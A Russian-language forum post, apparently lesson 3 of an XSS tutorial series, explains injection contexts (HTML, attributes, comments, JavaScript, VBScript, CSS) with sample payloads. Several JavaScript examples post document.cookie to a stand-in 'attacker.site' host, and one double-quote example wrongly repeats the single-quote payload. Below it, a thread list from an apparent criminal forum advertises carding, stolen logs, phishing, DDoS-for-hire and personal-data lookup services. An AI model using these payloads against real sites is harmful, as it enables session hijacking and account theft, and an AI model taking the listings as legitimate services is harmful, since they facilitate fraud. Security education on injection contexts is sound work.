Уроки по XSS: Урок 3. Контексты внедрения XSS

klobald

Original poster
Pro Member
Сообщения
134
Реакции
123
Посетить сайт
Веб-страница – это всего лишь текст, но браузер не смотрит на неё как на монолитный кусок текста, различные разделы страницы могут быть интерпретированы браузером по-разному: как HTML, CSS или JavaScript.

Как слово ключ в зависимости от используемого контектса может означать музыкальный знак, ключ — от двери, ключ — природный источник воды, ключ — гаечный ключ, ключ — регистрационный номер, вводимый для установки платного программного обеспечения; так и то влияние, которое оказывает пользовательский ввод зависит от контекста, в котором браузер пытается интерпретировать пользовательский ввод. Ниже составлен список различных контекстов, в которых пользовательский ввод может возникнуть на странице.


1) Простой HTML контекст
В теле существующего HTML тэга или в начале и в конце страницы вне тэга <html>.
Код:
<некий_html_тэг> пользовательский_ввод </некий_html_тэг>

В этом контексте вы можете в пользовательский ввод вписать валидный HTML любого рода и он немедленно будет воспроизведён браузером.

Например:
Код:
<img src=x onerror=alert(1)>


2) Контекст имени HTML атрибута
Внутри открытого HTML тэга, после имени тэга или после значения атрибута.
Код:
<некий_html_тэг пользовательский_ввод имя_некоего_атрибута="некое_значение_атрибута"/>

В этом контексте вы можете ввести имя обработчика событий и код JavaScript следующий за символом = и мы можем иметь исполняемый код, это можно рассматривать как исполнимый контекст.

Например:
Код:
onclick="alert(1)"


3) Контекст значения HTML атрибута
Внутри открытого HTML тэга, после имени атрибута отделённого символом =.
Код:
<некий_html_тэг имя_некоего_атрибута="пользовательский_ввод" />

<некий_html_тэг имя_некоего_атрибута='пользовательский_ввод' />

<некий_html_тэг имя_некоего_атрибута=пользовательский_ввод />

Есть три вариации этого контекста

  • Атрибут внутри двойных кавычек
  • Атрибут внутри одинарных кавычек
  • Атрибут без кавычек
Выполнение кода в этом контексте будет зависеть от типа атрибута, в котором появляется ввода. Есть три разных типа атрибутов:

a) Атрибуты события

Это такие атрибуты как onclick, onload и т.д. и значения этих атрибутов выполняются как JavaScript. Поэтому всё здесь – это то же самое, что и JavaScript контекст.

b) URL атрибуты

Эти атрибуты принимают URL в качестве значения, например, src атрибут различных тэгов. Ввод JavaScript URL здесь может привести к выполнению JavaScript.

Например:
Код:
javascript:some_javascript()

c) Специальные URL атрибуты

Это URL атрибуты, где ввод обычных URL может привести к проблемам безопасности.

Несколько примеров:
Код:
<script src="пользовательский_ввод"

<iframe src="пользовательский_ввод"

<frame src="пользовательский_ввод"

<link href="пользовательский_ввод"

<object data="пользовательский_ввод"

<embed src="пользовательский_ввод"

<form action="пользовательский_ввод"

<button formaction="пользовательский_ввод"

<base href="пользовательский_ввод"

<a href="пользовательский_ввод"

Ввод просто абсолютного http или https URL в этих случаях может оказать эффект на безопасность веб-сайта. В некоторых случаях, если возможно выгружать на сервер контролируемые пользователем данные, тогда даже ввод относительных URL здесь может привести к проблеме. Некоторым сайтам следует очищать http:// и https:// от введённых значений в этих атрибутах для предотвращения вставки здесь абсолютных URL, но есть много способов, которыми могут быть указаны абсолютные URL.

d) Атрибуты тега META

Meta теги, такие как Charset, могут влиять на то, как содержимые страницы интерпретируется браузером. И есть атрибут http-equiv, который может эмулировать поведение заголовков ответа HTTP. Воздействия на значения заголовков вроде Content-Type, Set-Cookie и т.д. будет иметь влияние на безопасность страницы.

e) Обычные атрибуты

Если ввод появляется в значениях обычных атрибутов, то этот контекст должен быть экранирован, чтобы это привело к выполнению кода. Если атрибут в кавычках, то нужно использовать соответствующую кавычку для выхода из контекста. В случае отсутствия в атрибуте кавычек, пробел или обратный слеш должны сделать эту работу. При выходе из контекста можно добавить новый обработчик событий, что приведёт к выполнению кода.

Например:
Код:
" onclick=alert(1)

' onclick=alert(1)

onclick=alert(1)


4) Контекст HTML комментариев
Внутри секции комментариев HTML
Код:
<!-- некий_комментарий пользовательский_ввод некий_комментарий -->

Это не исполняемый контекст и требуется выйти из контекста для выполнения кода. Ввод --> завершит этот контекст и переключит весь последующий текст в HTML контекст.

Например:
Код:
--><img src=x onerror=alert(1)>


5) Контекст JavaScript
Внутри раздела страницы JavaScript кода.
Код:
<script>

некоторый_javascript

пользовательский_ввод

некоторый_javascript

</script>

Это относится к разделу, заключённому в тэги SCRIPT, в значения атрибутов обработчиков событий и в URL, обрабатывающихся с JavaScript.

Внутри JavaScript пользовательский ввод может появляться в следующих контекстах:

  • a) Контекст кода
  • b) Контекст строки внутри одинарных кавычек
  • c) Контекст строки внутри двойных кавычек
  • d) Контекст комментария в одну строку
  • e) Контекст комментария в несколько строк
  • f) Строки, которые отправляются исполняющим поглотителям
Если пользовательский ввод между тэгами SCRIPT, то не имеет значения, в каком из контекстов он появился, вы можете переключиться на контекст HTML просто включив закрывающий тэг SCRIPT, а затем вставить любой HTML.

Например:
Код:
</script><img src=x onerror=alert(1)>

Если вы не собираетесь переключаться на HTML контекст, тогда вам нужно специально обработать ввод в зависимости от специфичного JavaScript контекста, в котором он появляется.

a) Контекст кода
Код:
function dev_func(input) {some_js_code}

dev_func(пользовательский_ввод);

some_variable=123;

Это исполняемый контекст, пользовательский ввод напрямую появляется в выражении и вы можете напрямую ввести элементы JavaScript и они будут выполнены.

Например:
Код:
$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

b) Контекст строки внутри одинарных кавычек
Код:
var some_variable='пользовательский_ввод';

Это не исполняемый контекст и пользовательский ввод должен включать одинарную кавычку в начале для выхода из контекста строки и перехода в контекст кода.

Например:
Код:
'; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

c) Контекст строки внутри двойных кавычек
Код:
var some_variable="пользовательский_ввод";

Это не исполняемый контекст и пользовательский ввод должен включать двойную кавычку в начале для выхода из контекста строки и перехода в контекст кода.

Например:
Код:
'; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

d) Контекст команды в одну строку
Код:
some_js_func();//пользовательский_ввод

Это не исполняемый контекст и пользовательский ввод должен включать символ новой строки для выхода из контекста комментария строки и переключения в контекст кода.

Например:
Код:
\r\n$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

e) Контекст многострочного комментария
Код:
some_js_func();

/*

пользовательский_ввод
Код:
*/

some_js_code

Это не исполняемый контекст и пользовательский ввод должен включать */ для выхода из контекста многострочного комментария и переключения в контекст кода.

Например:
Код:
*/$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

f) Строка, предназначенная для исполнителей кода

Эти контекст строк заключённых в кавычки или в двойные кавычки, но важно то, что эти строки передаются функциями или назначаются свойствам, которые будут обработаны как исполняемый код.

Вот несколько примеров:

  • eval("пользовательский_ввод");
  • location = "пользовательский_ввод";
  • setTimeout(1000, "пользовательский_ввод");
  • x.innerHTML = "пользовательский_ввод";
Дополнительные конструкции для исполнения кода смотрите в

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.

Это должно обрабатываться похожим образом с контекстом кода.


6) Контекст VB Script
В настоящие дни это большая редкость, но всё же вам может встретиться какой-нибудь странный сайт, использующий VBScript.
Код:
<script language="vbscript" type="text/vbscript">

some_vbscript

пользовательский_ввод
Код:
some_vbscript

</script>

Как JavaScript, вы можете переключиться на контекст HTML тэгом </SCRIPT>.

Внутри VBScript пользовательский ввод может появляться в следующих контекстах:

a) Контекст кода

b) Контекст строки внутри одинарных кавычек

c) Контекст строки внутри двойных кавычек

d) Строки, которые отправляются на исполняющий поглотитель

a) Контекст кода

Похоже на JavaScript эквивалент, вы можете напрямую вводить VBScript

b) Контекст строки внутри одинарных кавычек

VBScript имеет только однострочные комментарии и по аналогии с эквивалентом JavaScript ввод символа новой строки позволит выйти из контекста комментариев и переключиться на контекст кода.

c) Контекст строки внутри двойных кавычек

Похоже на JavaScript эквивалент

d) Строки, которые отправляются на исполняющий поглотитель

Похоже на JavaScript эквивалент


7) CSS Context
Внутри раздела CSS кода страницы.
Код:
<style>

some_css

пользовательский_ввод

some_css

</style>

Это относится к разделу, заключённому в теги STYLE, и в значения атрибутов стиля.

Внедрение CSS в страницу само по себе может иметь некоторое воздействие на эту страницу. Например, изменение расположения, видимости, размера и z-index элементов на страницы может сделать для пользователя возможным выполнить действия отличное от предполагаемых.

Но ещё интереснее как JavaScript может быть выполнена внутри CSS. Хотя в современных браузерах это невозможно, более старые поддерживали выполнение JavaScript двумя способами.

i. expression property

expression – это особенность только Internet Explorer, которая позволяла выполнение JavaScript встроенного внутри CSS.
Код:
css_selector

{

 property_name: expression(some_javascript);

}

ii. JavaScript URL

Некоторые CSS свойства вроде свойства background-image принимали URL в качестве своих значений. В более старых браузерах вставка здесь JavaScript URL приводила выполнению этого кода JavaScript.
Код:
css_selector

{

background-image: javascript:some_javascript()

}

Внутри CSS, пользовательский ввод может появиться в следующих контекстах:

  • a) Контекст оператора
  • b) Контекст строки заключённой в одиночные/двойные кавычки
  • c) Контекст многострочного комментария
  • d) Строки, отправляемые для выполнения
По аналогии с тэгом SCRIPT, если пользовательский ввод между тэгами STYLE, тогда вы можете переключиться на HTML контекст включив закрывающий тэг STYLE и затем вставив любой HTML.

Например:
Код:
</style><img src=x onerror=alert(1)>

Если вы не собираетесь переключаться на HTML контекст, тогда вам нужно приготовить ввод в зависимости от CSS контекста, в котором он появляется.

a) Контекст оператора

В этом контексте вы можете начать напрямую внедряя CSS для изменения страницы при атаке социальной инженерией или задействовать свойство выражения или метод JavaScript URL для внедрения кода JavaScript.

b) Контекст строки заключённой в одиночные/двойные кавычки

В начале ввода добавьте одиночную или двойную кавычку, чтобы завершить контекст строки и переключиться в контекст оператора.

c) Контекст многострочного комментария

По аналогии с многострочными комментариями в JavaScript ввод */ прекратит контекст комментария и переключит в контекст оператора.

d) Строки, отправляемые для выполнения

Это строки внутри одинарных или двойных кавычек, которые либо передаются в выражение свойства или в свойство, принимающее URL, например, background-image. В обоих случаях, данные внутри контекста строки могут интерпретироваться браузером как JavaScript код.
 
Название темы
Автор Заголовок Раздел Ответы Дата
klobald Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
klobald Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
Файт Уроки по C# .NET 2
P Видео-Уроки по С# Полезные статьи 8
Olie Уроки по HTML & CSS Другие ЯП 1
Levine Куплю Ключи TF2 по вашей цене. Куплю/Обменяю 0
MrMinister Продам Продажа карж CC под ФБ, ГУГЛ и другие цели, выборка по любым бинам - трафик с гугла Карты/CC/Банки/Enroll 0
thelulz Авто Бот по продаже Facebook и Gpay. Аккаунты/Админки/Документы 0
Kapusta_support Продам Kapusta.World - Создание банковский счетов, криптобирж, электронных кошельков и многое другое по USA. Карты/CC/Банки/Enroll 0
P Рассылка сообщений по вашей ЦА в Telegram. Добавление контактов в чаты и группы. Спам, рассылки, трафик, SEO 0
T Куплю В поиске селлера по логам FB Куплю/Обменяю 0
Vellis На проверке Vellis - сервис по внедрению вашей рекламы в форумную жизнь. Ищу работу. Предлагаю свои услуги. 1
prizrak11 Куплю Выкупим лиды на потребительские кредиты по РФ Куплю/Обменяю 1
Dharma_Service На проверке Услуги по рекламе | размещение ваших тем/топиков на тематических форумах Ищу работу. Предлагаю свои услуги. 1
D Продам Все шаблоны документов с Трампом и Уиком по самой низкой цене; обучение отрисовке, фотодропы, биллы, софт для баркодов USA Услуги дизайнеров/веб-разработчиков 5
Khan Проверено «KHAN Service» Пробив / поиск и сбор любой информации по РФ и Украине (Государственный / Мобильный / СДЭК). Комплексное решение задач Пробив информации/Прозвоны 0
NikitaKit На проверке Базы/проекты по сочным ценам Все что не подошло по разделу 1
quillton Интересно Создаем Telegram-бота по продаже виртуальных номеров. Обучения, схемы, мануалы 0
P Закрыто Premiumexchanger.com - услуги гаранта, продажа и покупка обменников, консультации по созданию обменника Корзина 1
A Продам Процессим СКАМ платежи по Европе и не только... Трафик, загрузки, инсталлы, iframe 1
A Предлагаю работу по всем РФ и РБ Ищу работу. Предлагаю свои услуги. 0
GetLeads На проверке Провожу обучение по работе с Телеграм Ищу работу. Предлагаю свои услуги. 1
W Заказать услуги Хакера,Доступ до БД сайтов,Взлом Сайтов,Взлом на заказ от [email protected] -решение проблем по взлому. Корзина 0
quillton Курс по Kali Linux Kali Linux 0
quillton Пособие по кардингу Раздача сс, ба и всего что связано с кардингом 2
E Exmymoney.com - Сервис по обмену криптовалюты онлайн Обменники 58
H Продам Cервис по размещению в сети ресурсов нестандартного содержания. Сайты/Хостинг/Сервера 1
Ёшкин_кот База для спам рассылки по e-mail (mix) Другое 2
Kashtan4ik Куплю Куплю аккаунты coinlist по ссылке,готовые(от1900р) Куплю/Обменяю 0
B Прибыльная ниша по созданию контента для западного зрителя Способы заработка 0
C Партнёрка по Crypto Phishing Serivce Предоставляю работу. Ищу специалиста. 1
YoungKitty Автоматический БОТ по продаже саморегов VCC / БА / Paypal и др. Аккаунты/Админки/Документы 1
Denik Интересно ФСБ сообщило, что члены хак-группы REvil арестованы по запросу США Новости в сети 2
HostingSupport !!АКЦИЯ!!! СКУПАЮ AZURE по 5000 RUB Финансы - биллинги, банки, кошельки, логи 0
nord_man Автоматический сервис по продаже сканов/фото документов Аккаунты/Админки/Документы 5
Senemany Куплю Бот по скупу TELEGRAM | От 5-7₽ | TDATA - папка из логов Куплю/Обменяю 0
fx7support Партнерка «Секс по телефону по предоплате» или «обратный звонок» Способы заработка 1
Jinaktiv Услуги по чекингу номеров авито Ищу работу. Предлагаю свои услуги. 0
buy_accounts_org Продам Качественные аккаунты соцсетей, мобильные прокси по лучшим ценам - BUY-ACCOUNTS.ORG Аккаунты/Админки/Документы 0
Khan Проверено «KHAN Service» Комплексный пробив и сбор информации по всем базам Украины Пробив информации/Прозвоны 1
119emperor 》DDOS аТаки《 услуги по временному отключению сайтов. Ищу работу. Предлагаю свои услуги. 0
Kalash Интересно Возьму на обучению по PayPal Предоставляю работу. Ищу специалиста. 0
A Обмен криптовалюты на наличные и онлайн по всему миру all24.cc Обменники 26
bobanuk Нужна база по городам миллионикам с гео данными Вопросы и интересы 0
HostingSupport Куплю Куплю логи по данным сервисам AZURE, RACKSPACE, HETZNER, LINODE, IONOS, AWS Amazon,и др Куплю/Обменяю 0
Data_UA Халявный бот для пробива по номеру телефона Другое 1
st.ap Схема по заработку на конвертации трафика из ютуба на кинопартнёрку. Способы заработка 1
K предлагаю работу по регистрации акк Предоставляю работу. Ищу специалиста. 1
Y в поисках врачей по украине Предоставляю работу. Ищу специалиста. 0
L Продам lacost.net - гипермаркет аккаунтов соц сетей, почтовых и других сервисов. Купить аккаунты вк, инстаграм, фейсбук и др. соц сети по приемлемым ценам. Аккаунты/Админки/Документы 1

Название темы